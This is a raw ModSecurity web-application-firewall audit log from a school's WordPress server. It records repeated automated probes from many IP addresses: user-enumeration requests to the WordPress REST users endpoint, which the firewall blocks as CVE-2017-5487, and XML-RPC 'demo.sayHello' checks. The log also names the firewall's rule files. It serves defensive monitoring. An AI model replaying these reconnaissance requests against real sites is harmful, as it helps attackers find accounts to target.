Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ddee590b-Z-- --9bb5990c-A-- [06/May/2025:00:12:02 +0700] aBjxYgRwKNFSM6B7_LaoQgAAAII 103.236.140.4 52008 103.236.140.4 8181 --9bb5990c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.88 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9bb5990c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bb5990c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465122776929 2532 (- - -) Stopwatch2: 1746465122776929 2532; combined=1103, p1=503, p2=576, p3=0, p4=0, p5=24, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bb5990c-Z-- --04397672-A-- [06/May/2025:00:12:05 +0700] aBjxZU2V_h1VFAgsfgaGtwAAABM 103.236.140.4 52032 103.236.140.4 8181 --04397672-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.88 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --04397672-C-- demo.sayHello --04397672-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --04397672-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465125572124 5722 (- - -) Stopwatch2: 1746465125572124 5722; combined=4294, p1=558, p2=3514, p3=32, p4=36, p5=92, sr=73, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04397672-Z-- --eb7d345f-A-- [06/May/2025:00:12:24 +0700] aBjxePZJDMuQndL03JNmigAAAEE 103.236.140.4 52242 103.236.140.4 8181 --eb7d345f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --eb7d345f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb7d345f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465144087943 2750 (- - -) Stopwatch2: 1746465144087943 2750; combined=1239, p1=427, p2=782, p3=0, p4=0, p5=30, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb7d345f-Z-- --7b9d977b-A-- [06/May/2025:00:12:30 +0700] aBjxfk2V_h1VFAgsfgaG0wAAAAY 103.236.140.4 52296 103.236.140.4 8181 --7b9d977b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.151 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7b9d977b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b9d977b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465150637346 2532 (- - -) Stopwatch2: 1746465150637346 2532; combined=1203, p1=403, p2=770, p3=0, p4=0, p5=29, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b9d977b-Z-- --43ab941c-A-- [06/May/2025:00:12:33 +0700] aBjxgU2V_h1VFAgsfgaG2QAAAA4 103.236.140.4 52332 103.236.140.4 8181 --43ab941c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.151 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --43ab941c-C-- demo.sayHello --43ab941c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --43ab941c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465153734921 5475 (- - -) Stopwatch2: 1746465153734921 5475; combined=4328, p1=566, p2=3512, p3=37, p4=35, p5=104, sr=72, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43ab941c-Z-- --928b0d72-A-- [06/May/2025:00:12:35 +0700] aBjxg02V_h1VFAgsfgaG3gAAABM 103.236.140.4 52348 103.236.140.4 8181 --928b0d72-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.101 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --928b0d72-C-- demo.sayHello --928b0d72-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --928b0d72-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465155693174 18510 (- - -) Stopwatch2: 1746465155693174 18510; combined=30037, p1=520, p2=3474, p3=32, p4=35, p5=13005, sr=73, sw=67, l=0, gc=12904 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --928b0d72-Z-- --f61ba81c-A-- [06/May/2025:00:12:36 +0700] aBjxhE2V_h1VFAgsfgaG4AAAAAs 103.236.140.4 52354 103.236.140.4 8181 --f61ba81c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.255 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f61ba81c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f61ba81c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465156543645 2504 (- - -) Stopwatch2: 1746465156543645 2504; combined=1172, p1=388, p2=754, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f61ba81c-Z-- --57e7623c-A-- [06/May/2025:00:12:39 +0700] aBjxh02V_h1VFAgsfgaG5gAAAA4 103.236.140.4 52384 103.236.140.4 8181 --57e7623c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.255 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --57e7623c-C-- demo.sayHello --57e7623c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --57e7623c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465159264247 4466 (- - -) Stopwatch2: 1746465159264247 4466; combined=3179, p1=409, p2=2595, p3=28, p4=30, p5=69, sr=57, sw=48, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57e7623c-Z-- --5ac9eb39-A-- [06/May/2025:00:12:41 +0700] aBjxiYZWvR7-42f6JrAUnAAAAMo 103.236.140.4 52420 103.236.140.4 8181 --5ac9eb39-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5ac9eb39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ac9eb39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465161674919 2822 (- - -) Stopwatch2: 1746465161674919 2822; combined=1470, p1=484, p2=949, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ac9eb39-Z-- --57289249-A-- [06/May/2025:00:12:44 +0700] aBjxjARwKNFSM6B7_LaoRQAAAJU 103.236.140.4 52448 103.236.140.4 8181 --57289249-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.116 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --57289249-C-- demo.sayHello --57289249-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --57289249-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465164460012 6974 (- - -) Stopwatch2: 1746465164460012 6974; combined=5168, p1=657, p2=4263, p3=38, p4=37, p5=102, sr=76, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57289249-Z-- --4bfc8844-A-- [06/May/2025:00:22:23 +0700] aBjzz4ZWvR7-42f6JrAWIQAAAMo 103.236.140.4 57086 103.236.140.4 8181 --4bfc8844-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4bfc8844-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4bfc8844-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465743916260 2891 (- - -) Stopwatch2: 1746465743916260 2891; combined=1259, p1=406, p2=819, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4bfc8844-Z-- --bb15a325-A-- [06/May/2025:00:22:24 +0700] aBjz0IZWvR7-42f6JrAWJAAAANQ 103.236.140.4 57096 103.236.140.4 8181 --bb15a325-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bb15a325-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb15a325-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465744921968 2783 (- - -) Stopwatch2: 1746465744921968 2783; combined=1265, p1=433, p2=802, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb15a325-Z-- --a7bd4971-A-- [06/May/2025:00:22:28 +0700] aBjz1PZJDMuQndL03JNndQAAAEs 103.236.140.4 57134 103.236.140.4 8181 --a7bd4971-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.126 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a7bd4971-C-- demo.sayHello --a7bd4971-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7bd4971-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465748209460 6550 (- - -) Stopwatch2: 1746465748209460 6550; combined=4709, p1=589, p2=3894, p3=36, p4=40, p5=89, sr=75, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7bd4971-Z-- --c5d87a26-A-- [06/May/2025:00:22:28 +0700] aBjz1PZJDMuQndL03JNndwAAAEk 103.236.140.4 57140 103.236.140.4 8181 --c5d87a26-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c5d87a26-C-- demo.sayHello --c5d87a26-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5d87a26-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465748570044 4885 (- - -) Stopwatch2: 1746465748570044 4885; combined=3646, p1=507, p2=2949, p3=27, p4=29, p5=79, sr=107, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5d87a26-Z-- --ad003b1f-A-- [06/May/2025:00:23:06 +0700] aBjz-oZWvR7-42f6JrAWRAAAANg 103.236.140.4 57432 103.236.140.4 8181 --ad003b1f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ad003b1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad003b1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465786601826 2828 (- - -) Stopwatch2: 1746465786601826 2828; combined=1268, p1=445, p2=794, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad003b1f-Z-- --cbdc510c-A-- [06/May/2025:00:23:10 +0700] aBjz_k2V_h1VFAgsfgaIkAAAAAk 103.236.140.4 57468 103.236.140.4 8181 --cbdc510c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.166 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cbdc510c-C-- demo.sayHello --cbdc510c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cbdc510c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465790199935 5280 (- - -) Stopwatch2: 1746465790199935 5280; combined=4280, p1=532, p2=3525, p3=31, p4=36, p5=93, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbdc510c-Z-- --44033916-A-- [06/May/2025:00:23:31 +0700] aBj0E4ZWvR7-42f6JrAWUwAAAMs 103.236.140.4 57636 103.236.140.4 8181 --44033916-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.149 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --44033916-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44033916-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s 